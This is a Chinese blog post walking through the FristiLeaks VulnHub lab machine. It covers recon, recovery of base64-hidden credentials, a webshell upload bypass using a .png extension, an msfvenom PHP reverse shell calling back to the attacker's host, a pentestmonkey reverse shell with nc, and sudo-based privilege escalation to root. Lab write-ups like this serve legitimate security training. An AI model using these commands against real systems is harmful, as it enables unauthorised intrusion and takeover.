<!DOCTYPE html>


<html lang="zh-CN">


<head>
  <meta charset="utf-8" />
    
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
  <title>
    FristiLeaks靶机实战 |  Time
  </title>
  <meta name="generator" content="hexo-theme-ayer">
  
  <link rel="shortcut icon" href="/favicon.ico" />
  
  
<link rel="stylesheet" href="/dist/main.css">

  
<link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/Shen-Yu/cdn/css/remixicon.min.css">

  
<link rel="stylesheet" href="/css/custom.css">

  
  
<script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>

  
  

  

</head>

</html>

<body>
  
  <canvas width="1777" height="841" style="position: fixed; left: 0px; top: 0px; z-index: 999; pointer-events: none;"></canvas>
  
  <div id="app">
    <main class="content on">
      <section class="outer">
  <article id="post-FristiLeaks靶机实战" class="article article-type-post" itemscope
  itemprop="blogPost" data-scroll-reveal>

  <div class="article-inner">
    
    <header class="article-header">
       
<h1 class="article-title sea-center" style="border-left:0" itemprop="name">
  FristiLeaks靶机实战
</h1>
 

    </header>
    

    
    <div class="article-meta">
      <a href="/2019/08/05/FristiLeaks%E9%9D%B6%E6%9C%BA%E5%AE%9E%E6%88%98/" class="article-date">
  <time datetime="2019-08-05T08:06:34.000Z" itemprop="datePublished">2019-08-05</time>
</a>
      
  <div class="article-category">
    <a class="article-category-link" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a>
  </div>

      
      
<div class="word_count">
    <span class="post-time">
        <span class="post-meta-item-icon">
            <i class="ri-quill-pen-line"></i>
            <span class="post-meta-item-text"> 字数统计:</span>
            <span class="post-count">1.2k</span>
        </span>
    </span>

    <span class="post-time">
        &nbsp; | &nbsp;
        <span class="post-meta-item-icon">
            <i class="ri-book-open-line"></i>
            <span class="post-meta-item-text"> 阅读时长≈</span>
            <span class="post-count">5 分钟</span>
        </span>
    </span>
</div>

      
    </div>
    

    
    
    <div class="tocbot"></div>





    

    
    <div class="article-entry" itemprop="articleBody">
      
      

      
      <p><img src="https://tva1.sinaimg.cn/large/008eGmZEly1gn0yq9lhxtj31c00u00z8.jpg" alt="99"></p>
<a id="more"></a>



<h3 id="0x00-环境搭建"><a href="#0x00-环境搭建" class="headerlink" title="0x00 环境搭建"></a>0x00 环境搭建</h3><p>靶机环境：Vmware<br>mac地址：08:00:27:A5:A6:76<br>攻击环境: kali、windows10<br>网络环境：桥接<br>IP:192.168.1.37</p>
<p>设置网络环境，先设置mac地址，后设置网络环境后，可发现靶机IP</p>
<h3 id="0x02-信息收集"><a href="#0x02-信息收集" class="headerlink" title="0x02 信息收集"></a>0x02 信息收集</h3><p>查看首页源代码，发现目标信息,获取root权限</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">Welcome to #Fristleaks, a quick hackme VM by @Ar0xA</span><br><span class="line">欢迎使用fristleaks，这是一个由@ar0xa提供的快速黑客虚拟机</span><br><span class="line"></span><br><span class="line">Goal: get UID 0 (root) and read the special flag file.</span><br><span class="line">目标：获取uid 0（根）并读取特殊标志文件。</span><br><span class="line"></span><br><span class="line">Timeframe: should be doable in 4 hours.</span><br><span class="line">时间框架：应该在4小时内完成。</span><br></pre></td></tr></table></figure>
<p><img src="https://i.imgur.com/ggjRMr0.png" alt=""><br>使用dirbuster扫描网站目录，发现robots.txt</p>
<p>robots文件</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">User-agent: *</span><br><span class="line">Disallow: &#x2F;cola</span><br><span class="line">Disallow: &#x2F;sisi</span><br><span class="line">Disallow: &#x2F;beer</span><br></pre></td></tr></table></figure>
<p>目录</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">images&#x2F; 图片目录</span><br><span class="line">icons&#x2F;	图标索引</span><br><span class="line">icons&#x2F;small&#x2F;  目录遍历，全是图片</span><br><span class="line">fristi&#x2F;</span><br></pre></td></tr></table></figure>
<p>fristi/目录下发现登录框<br><img src="https://i.imgur.com/RHZERFL.png" alt=""></p>
<p>登录提示密码错误，尝试注入一波<br>没有注入，查看源代码，发现两段base64字符串<br><img src="https://i.imgur.com/XJr10cT.png" alt=""></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;!-- </span><br><span class="line">TODO:</span><br><span class="line">We need to clean this up for production. I left some junk in here to make testing easier.</span><br><span class="line"></span><br><span class="line">- by eezeepz</span><br><span class="line">--&gt;</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx</span><br><span class="line">jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl</span><br><span class="line">S0iAQGY0Nb01&#x2F;&#x2F;dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw</span><br><span class="line">B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f</span><br><span class="line">m63yaP7&#x2F;XP&#x2F;5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd&#x2F;0TL2Wull5+RMpJq5tMTkE1paHlVXJJ</span><br><span class="line">Zv7&#x2F;d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb</span><br><span class="line">DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd</span><br><span class="line">jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU</span><br><span class="line">12qmC&#x2F;1&#x2F;Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5</span><br><span class="line">uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16&#x2F;i&#x2F;6BtvvEQzF5YM2JLhyMLz4sNNtp&#x2F;pSkg1</span><br><span class="line">04VajmwziEdZvmSz9E0YbzbI&#x2F;FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq</span><br><span class="line">i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg</span><br><span class="line">tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu&#x2F;PZy7VjHXJmC21H9lWvBBfdZb6Ws</span><br><span class="line">30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl</span><br><span class="line">3K&#x2F;U+z2uFJNWNcMmhLzUe2v6n&#x2F;dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK</span><br><span class="line">ul9iMrFG9gqa&#x2F;VTB8qORLuSTqF7fYU7tgsn&#x2F;4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q</span><br><span class="line">mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z&#x2F;vBMWulSfYlm+hDLkcIAtuHEUzu&#x2F;l9l867X34</span><br><span class="line">rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy&#x2F;VzOTCkqeBWlrrFhe</span><br><span class="line">EPdMjO3SSys7XVF+qmT5UcmT9+Ss&#x2F;&#x2F;fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH</span><br><span class="line">AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk</span><br><span class="line">CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9&#x2F;QNa7zik1qtycQAAAABJR</span><br><span class="line">U5ErkJggg&#x3D;&#x3D;</span><br></pre></td></tr></table></figure>
<p>使用base64解码是png图片格式，复制baese64字符，在kali下操作</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">base64 -d 12.txt</span><br><span class="line">base64 -d 12.txt &gt; 12.png</span><br></pre></td></tr></table></figure>
<p><img src="https://i.imgur.com/eIKTCdf.png" alt=""><br>打开图片发现一串字符,由此得知,注释是由eezeepz写的，密码则是图片中的字符</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">eezeepz:keKkeKKeKKeKkEkkEk</span><br></pre></td></tr></table></figure>
<p>PS:经测试两串base64编码通过此方法转换出来的图片都是一样的.</p>
<h3 id="0x02-获取webshell"><a href="#0x02-获取webshell" class="headerlink" title="0x02 获取webshell"></a>0x02 获取webshell</h3><p>登录后发现上传点,上传php文件，使用截断，服务端绕过方式失败。。最后发现就加.png可以上传,使用蚁剑连接成功。。<br><img src="https://i.imgur.com/jRwpxUq.png" alt=""><br>执行命令，尝试提权<br><img src="https://i.imgur.com/YnbRADe.png" alt=""></p>
<h3 id="0x03-提权"><a href="#0x03-提权" class="headerlink" title="0x03 提权"></a>0x03 提权</h3><p>查看eezeepz目录，发现有一个文本文件<br><img src="https://i.imgur.com/Vbcn9Bl.png" alt=""></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">Yo EZ,</span><br><span class="line"> </span><br><span class="line">I made it possible for you to do some automated checks, </span><br><span class="line">but I did only allow you access to &#x2F;usr&#x2F;bin&#x2F;* system binaries. I did</span><br><span class="line">however copy a few extra often needed commands to my </span><br><span class="line">homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those</span><br><span class="line">from &#x2F;home&#x2F;admin&#x2F;</span><br><span class="line"> </span><br><span class="line">Don&#39;t forget to specify the full path for each binary!</span><br><span class="line"> </span><br><span class="line">Just put a file called &quot;runthis&quot; in &#x2F;tmp&#x2F;, each line one command. The </span><br><span class="line">output goes to the file &quot;cronresult&quot; in &#x2F;tmp&#x2F;. It should </span><br><span class="line">run every minute with my account privileges.</span><br><span class="line"> </span><br><span class="line">- Jerry</span><br></pre></td></tr></table></figure>
<p>翻译下<br><img src="https://i.imgur.com/mkFVksi.png" alt=""><br>需要在tmp目录下建立runthis文件，并且写入命令，文件会在定时执行。。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo &quot;&#x2F;usr&#x2F;bin&#x2F;..&#x2F;..&#x2F;bin&#x2F;chmod -R 777 &#x2F;home&#x2F;admin&quot; &gt; &#x2F;tmp&#x2F;runthis</span><br></pre></td></tr></table></figure>
<p>失败了，未创建成功。<br><img src="https://i.imgur.com/XPyf1Gt.png" alt=""></p>
<p>使用脏牛提权，一直编译不成功.<br><img src="https://i.imgur.com/iG3BLHF.png" alt=""></p>
<p>猜测菜刀的shell问题，使用msf反弹shell</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p php&#x2F;meterpreter&#x2F;reverse_tcp LHOST&#x3D;192.168.1.23 LPORT&#x3D;4444 -f raw &gt;1.php</span><br></pre></td></tr></table></figure>
<p>kali监听，shell上传到靶机中，访问后成功反弹<br><img src="https://i.imgur.com/4FzlOFt.jpg" alt=""></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -c &#39;import pty;pty.spawn(&quot;&#x2F;bin&#x2F;bash&quot;)&#39; 反弹一个回显终端</span><br></pre></td></tr></table></figure>
<p>技术有点菜。。没有回显一个窗口回来，显示是反弹回来了。。尝试文章中的方法</p>
<p>下载php-反向壳</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;pentestmonkey.net&#x2F;tools&#x2F;web-shells&#x2F;php-reverse-shell</span><br></pre></td></tr></table></figure>
<p>修改php文件，设置ip和端口。<br>本地监听使用nc监听，shell上传到靶机中，这回反弹成功了<br><img src="https://i.imgur.com/zFYY0Y9.png" alt=""><br><img src="https://i.imgur.com/1lliDii.png" alt=""></p>
<p>查看/home/admin下文件<br>发现两个文本文件和一个py文件</p>
<p>重写python代码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn</span><br><span class="line">import base64,codecs,sys</span><br><span class="line"></span><br><span class="line">def encodeString(str):</span><br><span class="line">    base64string&#x3D; base64.b64encode(str)</span><br><span class="line">    return codecs.encode(base64string[::-1], &#39;rot13&#39;)</span><br><span class="line"></span><br><span class="line">def decodeString(str):</span><br><span class="line">    string &#x3D; str[::-1]</span><br><span class="line">    string &#x3D; string.encode(&quot;rot13&quot;)</span><br><span class="line">    return base64.b64decode(string)</span><br><span class="line"></span><br><span class="line">print decodeString(sys.argv[1])</span><br></pre></td></tr></table></figure>
<p>查看两个文本文件的内容得到两串字符串</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">cat cryptedpass.txt</span><br><span class="line">mVGZ3O3omkJLmy2pcuTq</span><br><span class="line">解密：thisisalsopw123</span><br><span class="line"></span><br><span class="line">cat whoisyourgodnow.txt</span><br><span class="line">&#x3D;RFn0AKnlMHMPIzpyuTI0ITG</span><br><span class="line">解密：LetThereBeFristi!</span><br><span class="line"></span><br><span class="line">测试账户：fristigod</span><br><span class="line">密码：LetThereBeFristi!</span><br><span class="line">登录成功</span><br></pre></td></tr></table></figure>
<p>使用sudo -l 提权到root，爆出错误<br><img src="https://i.imgur.com/vgGdtOw.png" alt=""></p>
<p>提示需要运行doCom文件,运行报错<br><img src="https://i.imgur.com/DfsJG54.png" alt=""></p>
<p>使用以下命令可执行文件</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo -u fristi .&#x2F;doCom &#x2F;bin&#x2F;sh</span><br></pre></td></tr></table></figure>
<p><img src="https://i.imgur.com/14BHh6C.png" alt=""></p>
<p>提权成功，cd到root目录下，查看flag文件<br>fristileaks_secrets.txt</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">Congratulations on beating FristiLeaks 1.0 by Ar0xA [https:&#x2F;&#x2F;tldr.nu]</span><br><span class="line"></span><br><span class="line">I wonder if you beat it in the maximum 4 hours it&#39;s supposed to take!</span><br><span class="line"></span><br><span class="line">Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)</span><br><span class="line"></span><br><span class="line">Flag: Y0u_kn0w_y0u_l0ve_fr1st1</span><br></pre></td></tr></table></figure>
<p>通关成功！！！</p>
<h3 id="0x04-总结"><a href="#0x04-总结" class="headerlink" title="0x04 总结"></a>0x04 总结</h3><p>1、脏牛提权。。看靶机内核是存在脏牛漏洞的，但是找了几个exp都无法编译成功。<br>2、反弹shell，这里反弹似乎只能使用反向反弹shell，用之前的几种方法都失败了，这是个盲区。<br>3、python代码这里出问题，把解密函数写成了加密函数，所以老是报错。<br>做完感觉真的不容易，整个靶机做下来基本都是跟着文章走的，还走了不少岔路。磕磕绊绊的终于是做完了。。</p>

      
      <!-- reward -->
      
    </div>
    
    
      <!-- copyright -->
      
        <div class="declare">
          <ul class="post-copyright">
            <li>
              <i class="ri-copyright-line"></i>
              <strong>版权声明： </strong>
              本博客所有文章除特别声明外，著作权归作者所有。转载请注明出处！
            </li>
          </ul>
        </div>
        
    <footer class="article-footer">
      
          
<div class="share-btn">
      <span class="share-sns share-outer">
        <i class="ri-share-forward-line"></i>
        分享
      </span>
      <div class="share-wrap">
        <i class="arrow"></i>
        <div class="share-icons">
          
          <a class="weibo share-sns" href="javascript:;" data-type="weibo">
            <i class="ri-weibo-fill"></i>
          </a>
          <a class="weixin share-sns wxFab" href="javascript:;" data-type="weixin">
            <i class="ri-wechat-fill"></i>
          </a>
          <a class="qq share-sns" href="javascript:;" data-type="qq">
            <i class="ri-qq-fill"></i>
          </a>
          <a class="douban share-sns" href="javascript:;" data-type="douban">
            <i class="ri-douban-line"></i>
          </a>
          <!-- <a class="qzone share-sns" href="javascript:;" data-type="qzone">
            <i class="icon icon-qzone"></i>
          </a> -->
          
          <a class="facebook share-sns" href="javascript:;" data-type="facebook">
            <i class="ri-facebook-circle-fill"></i>
          </a>
          <a class="twitter share-sns" href="javascript:;" data-type="twitter">
            <i class="ri-twitter-fill"></i>
          </a>
          <a class="google share-sns" href="javascript:;" data-type="google">
            <i class="ri-google-fill"></i>
          </a>
        </div>
      </div>
</div>

<div class="wx-share-modal">
    <a class="modal-close" href="javascript:;"><i class="ri-close-circle-line"></i></a>
    <p>扫一扫，分享到微信</p>
    <div class="wx-qrcode">
      <img src="//api.qrserver.com/v1/create-qr-code/?size=150x150&data=https://timeshu.github.io/2019/08/05/FristiLeaks%E9%9D%B6%E6%9C%BA%E5%AE%9E%E6%88%98/" alt="微信分享二维码">
    </div>
</div>

<div id="share-mask"></div>
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98/" rel="tag">靶场实战</a></li></ul>


    </footer>

  </div>

  
  
  <nav class="article-nav">
    
      <a href="/2019/08/08/Mysql%E5%85%A5%E9%97%A8%E6%89%8B%E5%86%8C/" class="article-nav-link">
        <strong class="article-nav-caption">上一篇</strong>
        <div class="article-nav-title">
          
            Mysql入门手册
          
        </div>
      </a>
    
    
      <a href="/2019/08/04/%E5%85%B3%E4%BA%8Ejava%E4%B8%AD%E4%B8%8D%E5%B8%A6%E7%AC%A6%E5%8F%B7%E5%8F%B3%E7%A7%BB%E9%97%AE%E9%A2%98%E5%A1%AB%E5%9D%91/" class="article-nav-link">
        <strong class="article-nav-caption">下一篇</strong>
        <div class="article-nav-title">关于java中不带符号右移问题填坑</div>
      </a>
    
  </nav>


  

  
  
<!-- valine评论 -->
<div id="vcomments-box">
    <div id="vcomments">
    </div>
</div>
<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<script src='https://cdn.jsdelivr.net/npm/valine@1.3.10/dist/Valine.min.js'></script>
<script>
    new Valine({
        el: '#vcomments',
        app_id: '',
        app_key: '',
        path: window.location.pathname,
        notify: false,
        verify: false,
        avatar: 'monsterid',
        placeholder: '给我的文章加点评论吧~',
        recordIP: true
    });
    const infoEle = document.querySelector('#vcomments .info');
    if (infoEle && infoEle.childNodes && infoEle.childNodes.length > 0) {
        infoEle.childNodes.forEach(function (item) {
            item.parentNode.removeChild(item);
        });
    }
</script>
<style>
    #vcomments-box {
        padding: 5px 30px;
    }

    @media screen and (max-width: 800px) {
        #vcomments-box {
            padding: 5px 0px;
        }
    }

    #vcomments-box #vcomments {
        background-color: #fff;
    }

    .v .vlist .vcard .vh {
        padding-right: 20px;
    }

    .v .vlist .vcard {
        padding-left: 10px;
    }
</style>

  

  
  
  
  
  

</article>
</section>
      <footer class="footer">
  <div class="outer">
    <ul>
      <li>
        Copyrights &copy;
        2015-2021
        <i class="ri-heart-fill heart_icon"></i> John Doe
      </li>
    </ul>
    <ul>
      <li>
        
        
        
        由 <a href="https://hexo.io" target="_blank">Hexo</a> 强力驱动
        <span class="division">|</span>
        主题 - <a href="https://github.com/Shen-Yu/hexo-theme-ayer" target="_blank">Ayer</a>
        
      </li>
    </ul>
    <ul>
      <li>
        
        
        <span>
  <span><i class="ri-user-3-fill"></i>访问人数:<span id="busuanzi_value_site_uv"></span></s>
  <span class="division">|</span>
  <span><i class="ri-eye-fill"></i>浏览次数:<span id="busuanzi_value_page_pv"></span></span>
</span>
        
      </li>
    </ul>
    <ul>
      
    </ul>
    <ul>
      <li>
        <!-- cnzz统计 -->
        
        <script type="text/javascript" src='https://s4.cnzz.com/z_stat.php?id=1278951134&amp;web_id=1278951134'></script>
        
      </li>
    </ul>
  </div>
</footer>
      <div class="float_btns">
        <div class="totop" id="totop">
  <i class="ri-arrow-up-line"></i>
</div>

<div class="todark" id="todark">
  <i class="ri-moon-line"></i>
</div>

      </div>
    </main>
    <aside class="sidebar on">
      <button class="navbar-toggle"></button>
<nav class="navbar">
  
  <div class="logo">
    <a href="/"><img src="/images/ayer-side.svg" alt="Time"></a>
  </div>
  
  <ul class="nav nav-main">
    
    <li class="nav-item">
      <a class="nav-item-link" href="/">主页</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/archives">归档</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/categories">分类</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/tags">标签</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/suibi">随笔</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/about">关于我</a>
    </li>
    
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      
      <a class="nav-item-link nav-item-search"  title="搜索">
        <i class="ri-search-line"></i>
      </a>
      
      
      <a class="nav-item-link" target="_blank" href="/atom.xml" title="RSS Feed">
        <i class="ri-rss-line"></i>
      </a>
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
    </aside>
    <script>
      if (window.matchMedia("(max-width: 768px)").matches) {
        document.querySelector('.content').classList.remove('on');
        document.querySelector('.sidebar').classList.remove('on');
      }
    </script>
    <div id="mask"></div>

<!-- #reward -->
<div id="reward">
  <span class="close"><i class="ri-close-line"></i></span>
  <p class="reward-p"><i class="ri-cup-line"></i></p>
  <div class="reward-box">
    
    
  </div>
</div>
    
<script src="/js/jquery-2.0.3.min.js"></script>


<script src="/js/lazyload.min.js"></script>

<!-- Subtitle -->

<script>
  try {
    var typed = new Typed("#subtitle", {
      strings: ['生死看淡，不服就干', '只要学不死，就往死里学', '坚持总会胜利，不死终会出头'],
      startDelay: 0,
      typeSpeed: 200,
      loop: true,
      backSpeed: 100,
      showCursor: true
    });
  } catch (err) {
    console.log(err)
  }
</script>

<!-- Tocbot -->


<script src="/js/tocbot.min.js"></script>

<script>
  tocbot.init({
    tocSelector: '.tocbot',
    contentSelector: '.article-entry',
    headingSelector: 'h1, h2, h3, h4, h5, h6',
    hasInnerContainers: true,
    scrollSmooth: true,
    scrollContainer: 'main',
    positionFixedSelector: '.tocbot',
    positionFixedClass: 'is-position-fixed',
    fixedSidebarOffset: 'auto'
  });
</script>

<script src="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.js"></script>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.css">
<script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js"></script>

<script src="/dist/main.js"></script>

<!-- ImageViewer -->

<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>

    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">

        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                <!--  Controls are self-explanatory. Order can be changed. -->

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" style="display:none" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div>

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.min.css">
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"></script>

<script>
    function viewer_init() {
        let pswpElement = document.querySelectorAll('.pswp')[0];
        let $imgArr = document.querySelectorAll(('.article-entry img:not(.reward-img)'))

        $imgArr.forEach(($em, i) => {
            $em.onclick = () => {
                // slider展开状态
                // todo: 这样不好，后面改成状态
                if (document.querySelector('.left-col.show')) return
                let items = []
                $imgArr.forEach(($em2, i2) => {
                    let img = $em2.getAttribute('data-idx', i2)
                    let src = $em2.getAttribute('data-target') || $em2.getAttribute('src')
                    let title = $em2.getAttribute('alt')
                    // 获得原图尺寸
                    const image = new Image()
                    image.src = src
                    items.push({
                        src: src,
                        w: image.width || $em2.width,
                        h: image.height || $em2.height,
                        title: title
                    })
                })
                var gallery = new PhotoSwipe(pswpElement, PhotoSwipeUI_Default, items, {
                    index: parseInt(i)
                });
                gallery.init()
            }
        })
    }
    viewer_init()
</script>

<!-- MathJax -->

<!-- Katex -->

<!-- busuanzi  -->


<script src="/js/busuanzi-2.3.pure.min.js"></script>


<!-- ClickLove -->


<script src="/js/clickLove.js"></script>


<!-- ClickBoom -->


<script src="/js/clickBoom.js"></script>


<!-- CodeCopy -->


<link rel="stylesheet" href="/css/clipboard.css">

<script src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js"></script>
<script>
  function wait(callback, seconds) {
    var timelag = null;
    timelag = window.setTimeout(callback, seconds);
  }
  !function (e, t, a) {
    var initCopyCode = function(){
      var copyHtml = '';
      copyHtml += '<button class="btn-copy" data-clipboard-snippet="">';
      copyHtml += '<i class="ri-file-copy-2-line"></i><span>COPY</span>';
      copyHtml += '</button>';
      $(".highlight .code pre").before(copyHtml);
      $(".article pre code").before(copyHtml);
      var clipboard = new ClipboardJS('.btn-copy', {
        target: function(trigger) {
          return trigger.nextElementSibling;
        }
      });
      clipboard.on('success', function(e) {
        let $btn = $(e.trigger);
        $btn.addClass('copied');
